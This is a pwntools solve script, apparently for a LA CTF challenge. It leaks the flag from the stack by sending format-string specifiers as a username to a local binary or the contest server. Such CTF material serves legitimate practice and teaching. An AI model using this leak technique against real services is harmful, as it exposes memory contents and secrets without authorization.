Source
Solution
#!/usr/bin/env python3
from pwn import *
from termcolor import colored
from tqdm import tqdm
exe = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
rop = ROP(exe)
context.binary = exe
context.terminal = ["alacritty", "-e", "sh", "-c"]
dbginit = """
b *main
c
"""
def conn():
if args.REMOTE:
r = remote("chall.lac.tf", 31142)
else:
r = process([exe.path])
if args.GDB:
gdb.attach(r, gdbscript=dbginit)
return r
def read_mem():
flag = b''
for i in tqdm(range(6, 11)):
r = process([exe.path])
p = f"%{i}$p".encode("ascii")
r.sendlineafter(b'username: ', p)
r.sendlineafter(b'password1: ', b'1')
r.sendlineafter(b'password2: ', b'2')
r.recvuntil(b'user ')
flag += r.recvuntil(b'\n').strip(b'\n') + b', '
r.clean()
flag = flag.split(b', ')
for i in range(len(flag)-1):
print((str(i + 1) + ":").ljust(5), end="")
print(flag[i].ljust(20),end="")
if flag[i] != b'(nil)':
print(" --> ",end="")
print(p64(int(flag[i],16)),end="")
print()
def read_mem_remote():
p = b''
r = conn()
for i in range(6,11):
p += f"%{i}$p, ".encode("ascii")
r.sendlineafter(b'username: ', p)
r.sendlineafter(b'password1: ', b'1')
r.sendlineafter(b'password2: ', b'2')
r.recvuntil(b'user ')
leak = r.recvuntil(b'\n').strip(b'\n').split(b', ')
print(leak)
flag = b''
for f in leak:
if (f != b'(nil)') & (f != b''):
flag += p64(int(f.decode("ascii"),16))
else:
flag += b'\x00'*8
print(flag)
def main():
read_mem_remote()
if __name__ == "__main__":
main()